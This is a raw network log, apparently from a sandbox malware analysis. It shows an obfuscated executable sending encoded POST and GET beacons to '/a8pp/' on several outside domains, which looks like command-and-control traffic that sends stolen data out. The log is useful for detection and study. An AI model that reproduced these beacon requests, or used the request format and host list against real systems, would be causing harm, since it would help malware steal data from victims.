                                        Jun 4, 2024 14:35:18.998558998 CEST    208    IN    HTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                        11    192.168.11.30    49805    91.195.240.19    80    7152    C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp    Bytes transferred    Direction    Data
                                        Jun 4, 2024 14:35:21.522898912 CEST    1706    OUT    POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.continentaloilandgas.com
                                        Origin: http://www.continentaloilandgas.com
                                        Referer: http://www.continentaloilandgas.com/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8= [TRUNCATED]
                                        Jun 4, 2024 14:35:21.748950958 CEST    208    IN    HTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                        12    192.168.11.30    49806    91.195.240.19    80    7152    C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp    Bytes transferred    Direction    Data
                                        Jun 4, 2024 14:35:24.278239965 CEST    478    OUT    GET /a8pp/?2NlhHLS8=eXj7agnwQ7UtDQTI2/QeRjNOKmxKRYHEwlq+kXNt3DleoKuUYGucHmIzSo9PpxNipdSpHjsdoNiIZ3Hh69GYDO27Wp3lPM6WDcDlV706K5XwonPjk8UKoRY=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.continentaloilandgas.com
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:35:24.509035110 CEST    208    IN    HTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                        13    192.168.11.30    49807    172.67.205.56    80    7152    C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp    Bytes transferred    Direction    Data
                                        Jun 4, 2024 14:35:29.905637026 CEST    760    OUT    POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.barrettdigitalart.com
                                        Origin: http://www.barrettdigitalart.com
                                        Referer: http://www.barrettdigitalart.com/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=Mt643xzJw6Im90pFe0zzX1IR+lFqGHkgxqRUH7affZJ31vzisjdqwWy899f3lD/7VcoryKepmt7qtOWNoTSk3gOOOsuflgSxTyUEvizhyw6DJ6TgkH2iZSfxDAzwokfUvDqWqiPnElobaspv7FayN7J2JqAACp5k8i0t88WixDldndQjWlWEsM1GC3Ornq2hyA==
                                        Jun 4, 2024 14:35:30.081255913 CEST    814    IN    HTTP/1.1 301 Moved Permanently
                                        Date: Tue, 04 Jun 2024 12:35:30 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Location: https://www.barrettdigitalart.com/a8pp/
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DcSlNnU%2BDpgFXsKs%2B2moimqanwn1k7dYzTVhug2wVuom6VN6pqYS2yI%2BxF1zbnN%2FyCQtukuahr0PmIJj9I565eE5jNaxNWTbOSfK20rCs3LRfK9SfD2%2BLsz3WXprj4zB3maD2iBZERkl0ui2"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 88e7f6905a27b030-ATL
                                        alt-svc: h3=":443"; ma=86400
                                        Data Ascii: a9<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.22.1</center></body></html>
                                        Jun 4, 2024 14:35:30.081365108 CEST    5    IN    Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                        14    192.168.11.30    49808    172.67.205.56    80    7152    C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp    Bytes transferred    Direction    Data
                                        Jun 4, 2024 14:35:32.566266060 CEST    780    OUT    POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.barrettdigitalart.com
                                        Origin: http://www.barrettdigitalart.com
                                        Referer: http://www.barrettdigitalart.com/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=Mt643xzJw6Im/VZFbS7zDlISiVFqfXkkxqdUH/CPfKt31ODirR1q1Wy8zdfu9j/sVcleyOapmtvqtPGNolan2wOIIsud6wSxTyUEvi3fyxSDJLjgliChUyfyCAzwi0e8vDqwqjTBEnQbatZv70a9WLJ0HKBPLb9t5wMZ3d2fpC4hmKh5LmiG/sJre2jDlo36vFQXirId6ydFMWKbUFDuQ9Y=
                                        Jun 4, 2024 14:35:32.773297071 CEST    808    IN    HTTP/1.1 301 Moved Permanently
                                        Date: Tue, 04 Jun 2024 12:35:32 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Location: https://www.barrettdigitalart.com/a8pp/
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l9GCDbViWug7Kfnoz9gqhgxB54Y2TgagedbVI%2B2IfoWzqX7qfqEy3tTZMnHRl1jefSX1DTMglyNEm%2FAQGXXg3YPTCS49ClTdczFIDyKklfuZuaFejuqoXoUlAD6Xk42EeYE9rhAfjU6VMmPM"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 88e7f6a0fe4aa4d9-MIA
                                        alt-svc: h3=":443"; ma=86400
                                        Data Ascii: a9<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.22.1</center></body></html>
                                        Jun 4, 2024 14:35:32.773309946 CEST    5    IN    Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                        15    192.168.11.30    49809    172.67.205.56    80    7152    C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp    Bytes transferred    Direction    Data
                                        Jun 4, 2024 14:35:35.227344990 CEST    1697    OUT    POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.barrettdigitalart.com
                                        Origin: http://www.barrettdigitalart.com
                                        Referer: http://www.barrettdigitalart.com/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8= [TRUNCATED]
                                        Jun 4, 2024 14:35:35.443810940 CEST    808    IN    HTTP/1.1 301 Moved Permanently
                                        Date: Tue, 04 Jun 2024 12:35:35 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Location: https://www.barrettdigitalart.com/a8pp/
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M%2BKMw3BmZ2SJkesFgXyu1NtjvBPhhi1s27mqnZqfZc4DTSRPFe4i5ABuCUmSXZjmzHWhp746cqDSqH5XnbeT%2FOGCnE08pTKj324oNC4V3H6MPDB1SmfDl7mnwWYGzehQ2LkWeJp1b1SLZGme"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 88e7f6b19eff21f4-MIA
                                        alt-svc: h3=":443"; ma=86400
                                        Data Ascii: a9<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.22.1</center></body></html>
                                        Jun 4, 2024 14:35:35.443823099 CEST    5    IN    Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                        16    192.168.11.30    49810    172.67.205.56    80    7152    C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp    Bytes transferred    Direction    Data
                                        Jun 4, 2024 14:35:37.881932974 CEST    475    OUT    GET /a8pp/?2NlhHLS8=BvSY0HG9ptJk0xE7dSL0fFQR6AxOGAU+8c5Ef4OBDo9qqf/VxjEZ5E2E1NHp9TnNNsYisL6gkMTIkNi6jhWj2SyZPZL3px+pF3gDkQLIxS6HPpaQiGGsZmE=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.barrettdigitalart.com
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:35:38.109041929 CEST    952    IN    HTTP/1.1 301 Moved Permanently
                                        Date: Tue, 04 Jun 2024 12:35:38 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Location: https://www.barrettdigitalart.com/a8pp/?2NlhHLS8=BvSY0HG9ptJk0xE7dSL0fFQR6AxOGAU+8c5Ef4OBDo9qqf/VxjEZ5E2E1NHp9TnNNsYisL6gkMTIkNi6jhWj2SyZPZL3px+pF3gDkQLIxS6HPpaQiGGsZmE=&0z=jXZhddsppL
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A7Tr21ZAxfEnu%2B6K4nO0XooYHmTtbKSngPWnwuLmkRRxt5ssWM4LEcbqopqIYN1YlW8qdcKKHUs6UMjLQZvmjxMfASWnRDWu1A502VmWpL63SRFHvfYjiubfZe7XkYYbAMJITPFV2C%2Bck9V1"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 88e7f6c228a9453e-ATL
                                        alt-svc: h3=":443"; ma=86400
                                        Data Ascii: a9<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.22.1</center></body></html>
                                        Jun 4, 2024 14:35:38.109055042 CEST    5    IN    Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                        17    192.168.11.30    49811    162.0.237.22    80    7152    C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp    Bytes transferred    Direction    Data
                                        Jun 4, 2024 14:35:43.508296967 CEST    745    OUT    POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.astralavenue.xyz
                                        Origin: http://www.astralavenue.xyz
                                        Referer: http://www.astralavenue.xyz/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=NsRClavgw11fhn+E9LhffIz5TlELfaR0hVLo0+GYTrImPpVCerDGp+VxaiB+8GenUvUjis9Su4pfMkCMtMn2DN1tHi/7FT/5JjMAHIvunc/Se5CYPXLARJM8e6+/cqdhfVpnjbC5Yh791gRE8/DxQNUelKkrGFACAbN1fGmU9m7q5Ve2eHUCjZQ8NItORuUd+w==
                                        Jun 4, 2024 14:35:43.701510906 CEST    533    IN    HTTP/1.1 404 Not Found
                                        Date: Tue, 04 Jun 2024 12:35:43 GMT
                                        Server: Apache
                                        Content-Length: 389
                                        Connection: close
                                        Content-Type: text/html
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        18 | 192.168.11.30 | 49812 | 162.0.237.22 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:35:46.209690094 CEST | 765 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.astralavenue.xyz
                                        Origin: http://www.astralavenue.xyz
                                        Referer: http://www.astralavenue.xyz/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=NsRClavgw11fhGuE7YJfWIz+dFELIKR4hVPo08qITd4mBrdCfqDGq+VxSCB/4GesUvQdiu5Su49fMmKMt/P1Cd1jSy/DBT/5JjMAHIrXncXSeKqYOzeWbpNOWa+/YqdlfVowjafeYjz91kdE8qvwZNUiqqlCBlhsEYJXWWGkzjHt1ivsDEgAw5sRRJAmTsVGj/yMDOpN1alP+0pUE+xWu68=
                                        Jun 4, 2024 14:35:46.388222933 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                        Date: Tue, 04 Jun 2024 12:35:46 GMT
                                        Server: Apache
                                        Content-Length: 389
                                        Connection: close
                                        Content-Type: text/html
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        19 | 192.168.11.30 | 49813 | 162.0.237.22 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:35:48.923960924 CEST | 1682 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.astralavenue.xyz
                                        Origin: http://www.astralavenue.xyz
                                        Referer: http://www.astralavenue.xyz/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:35:49.115365028 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                        Date: Tue, 04 Jun 2024 12:35:49 GMT
                                        Server: Apache
                                        Content-Length: 389
                                        Connection: close
                                        Content-Type: text/html
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        20 | 192.168.11.30 | 49814 | 162.0.237.22 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:35:51.616478920 CEST | 470 | OUT | GET /a8pp/?2NlhHLS8=Au5imsmV21JYiQqAtZZYW5jQMTc/TsZAtUnDsMKbX4YoEplVSL6Rm/9dTWFSyViTXIIw8p1ls4ghLUagt/HJKO94HieJHgrJIyAOML3UnsK6ear2OzXGe/M=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.astralavenue.xyz
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:35:51.793075085 CEST | 548 | IN | HTTP/1.1 404 Not Found
                                        Date: Tue, 04 Jun 2024 12:35:51 GMT
                                        Server: Apache
                                        Content-Length: 389
                                        Connection: close
                                        Content-Type: text/html; charset=utf-8
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        21 | 192.168.11.30 | 49815 | 64.190.62.22 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:35:57.255354881 CEST | 751 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.nurse-job2535.life
                                        Origin: http://www.nurse-job2535.life
                                        Referer: http://www.nurse-job2535.life/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=UW4VQ8guDJ7h1+Zuuq7X95+eBYoq3z/RvieTOC95oK4YLhWpKdOrWw2LLMHQZlG7EF6GX303CEeu50+/RTG5lxOSK8ZsLOuZoWGNilBCmE1Qwj/gQQb7UwGgHq9Cql/YwwWrRCaUS9W23TKvTQm+TCB8C4CEjeqUP2Irtxqt5hcSsxzQW3F6bKP/1seKDOV/yA==
                                        Jun 4, 2024 14:35:57.479831934 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                        date: Tue, 04 Jun 2024 12:35:57 GMT
                                        content-type: text/html
                                        content-length: 556
                                        server: NginX
                                        connection: close
                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        22 | 192.168.11.30 | 49816 | 64.190.62.22 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:36:00.013461113 CEST | 771 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.nurse-job2535.life
                                        Origin: http://www.nurse-job2535.life
                                        Referer: http://www.nurse-job2535.life/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Ascii: 2NlhHLS8=UW4VQ8guDJ7h1dBuhr7XsJ+dL4oqhD/VvjiTOD40o4sYLBmpNY6rVw2LfcHVE1GwEFGwX343CEau52W/Rge+0xOQSMZqEuuZoWGNilVkmEtQwSPgfVn4XwGjXa9ChF/UwwWCRH7zS/u23W2vUBmxZCB+OoD2r/KQJHBdqA201wUmtmCKL0x4IqzSptziBMUkvHbf6GmKSrX7jnL3fJKk9bE=
                                        Jun 4, 2024 14:36:00.238460064 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                        date: Tue, 04 Jun 2024 12:36:00 GMT
                                        content-type: text/html
                                        content-length: 556
                                        server: NginX
                                        connection: close
                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        23 | 192.168.11.30 | 49817 | 64.190.62.22 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:36:02.763251066 CEST | 1289 | OUT | POST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.nurse-job2535.life
                                        Origin: http://www.nurse-job2535.life
                                        Referer: http://www.nurse-job2535.life/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:36:02.763315916 CEST | 399 | OUT |
                                        Data Ascii: 1JF0qqBnOx7dQ3W4Sr2YyD8O+tvik7ytjENWtI8e4rsQs7H5ii/E0GLRYEAvnRNV4AITG2rLlrI51cvkqCYZnY3xXjVahG77G/daGDKVd1lL52/FcTFhS1vUXO1hPkJP6sbNiGxZVzbRfagy9QCqwSp0Eu6CBpHorw+JyTi5I0xo2kHeVLBTc5YEG/QtHpyTGJaMe1/+fpflsJakaaW16tzzkVPy2PXK0GXz9ig6DBqnn+Yct5O
                                        Jun 4, 2024 14:36:02.988218069 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                        date: Tue, 04 Jun 2024 12:36:02 GMT
                                        content-type: text/html
                                        content-length: 556
                                        server: NginX
                                        connection: close
                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        24 | 192.168.11.30 | 49818 | 64.190.62.22 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:36:05.512490034 CEST | 472 | OUT | GET /a8pp/?2NlhHLS8=ZUQ1TL0seNvx54VLi4j8goKVXeEHsH3HvniJXC80qaRkGy2/Bav7bR6THbfzZ3GDEHeASBxbKXGg0EinUgac1wLiet4LPvLUzSGHrF52u0MP0A2xTBnpXUY=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.nurse-job2535.life
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:36:05.740421057 CEST | 107 | IN | HTTP/1.1 436
                                        date: Tue, 04 Jun 2024 12:36:05 GMT
                                        content-length: 0
                                        server: NginX
                                        connection: close


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        25 | 192.168.11.30 | 49819 | 23.227.38.74 | 80 | 7152 | C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Jun 4, 2024 14:36:11.113908052 CEST | 748 | OUT | POST /a8pp/ HTTP/1.1
